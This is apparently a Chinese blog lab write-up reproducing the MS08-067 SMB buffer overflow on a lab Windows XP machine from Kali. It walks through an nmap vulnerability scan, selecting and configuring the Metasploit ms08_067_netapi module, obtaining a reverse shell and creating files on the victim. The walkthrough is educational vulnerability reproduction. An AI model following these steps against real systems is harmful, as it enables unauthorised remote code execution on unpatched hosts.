漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】

1.漏洞详情信息表:

漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第1张图片

2.系统和软件环境配置详情信息表:

虚拟机软件:vmware workstation 14
系统:Windows XP 系统、Kali系统
环境配置:(1)受害机:Windows XP SP3镜像(2)攻击机:Kali系统

3.漏洞还原详细步骤:

(1)虚拟机受害机系统和攻击机系统之间能够相互通信
攻击机:Kali-192.168.110.129
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第2张图片

目标机:Windows XP-192.168.110.128
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第3张图片

(2)打开Windows XP系统,确定445端口开启。
输入“netstat -sn”查看端口445是否打开。
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第4张图片

(3)关闭Windows XP系统的防火墙。
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第5张图片

(4)利用Nmap工具扫描端口及确认该漏洞是否存在。
nmap漏扫脚本目录为“/usr/share/nmap/script/”,
输入:nmap -n -p 445 --script smb-vuln-ms08-067 192.168.110.128 --open
结果如下:扫描结果为VULNERABLE,表示MS0808-067漏洞存在且可以利用。
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第6张图片

(5)进入Msfconsole并利用search语句查找漏洞利用模块。
在终端内输入msfconsole打开metasploite命令行客户端
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第7张图片

输入search ms08-067查找漏洞利用模块。
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第8张图片

(6)进入漏洞模块,并查看相关的使用说明。
输入use exploit/windows/smb/ms08_067_netapi和show options,
使用use命令选择我们要使用的利用模块
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第9张图片

target设置为系统默认是自动定位,
输入show targets查看所有,然后根据系统选择ID为34进行精确定位
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第10张图片
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第11张图片

(7)设置攻击机、受害机信息。
设置目标机IP、端口号、payload;攻击机IP
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第12张图片

输入show options,显示配置信息
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第13张图片

4.漏洞测试或验证详细步骤:

(1)运行exploit反弹shell。
此时成功获取了Windows XP系统的Shell
输入exploit
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第14张图片

调用“ipconfig”查看被攻击电脑的IP地址也是目标的192.168.110.128
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第15张图片

(2)在目标主机上创建文件夹及文件。
在目标主机新建文件夹、访问目录
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第16张图片

创建文件并写入内容
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第17张图片

在目标机上查看

漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第18张图片
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第19张图片

5.漏洞危害分析:

MS08-067漏洞全称是“Microsoft Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,并通过Metasploit工具获取shell及进行深入的操作,造成栈缓冲区内存错误,从而被利用实施远程代码执行。
当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时,该漏洞可以用于蠕虫攻击。它影响了某些旧版本的Windows系统,包括:Windows 2000、Windows XP、Windows Server 2003。
通过MS08-067漏洞我们可以控制目标机:在目标主机上创建文件夹及文件、对目标XP主机进行深度提权、开启远程连接3389端口并进行远程操作等。

6.个人感悟:

(1)遇到的问题
在运行exploit执行漏洞利用模块时,一直提示“exploit completed,but no session was created”。
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】_第20张图片
查找原因发现是445端口异常关闭,重启目标机即可。
(2)感悟
本次实验利用Metasploit复现了MS08-067远程代码执行漏洞,涉及漏洞发现、验证漏洞、利用漏洞的完整过程,并利用Metasploit工具进行shell反弹及文件创建。
对445端口有了更深入的理解:445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也让黑客们有了可乘之机,他们能通过该端口偷偷共享我们的硬盘,甚至会在悄无声息中将我们的硬盘格式化掉!因此一定要关闭445端口。

你可能感兴趣的:(网络安全,microsoft,windows,rpc,linux)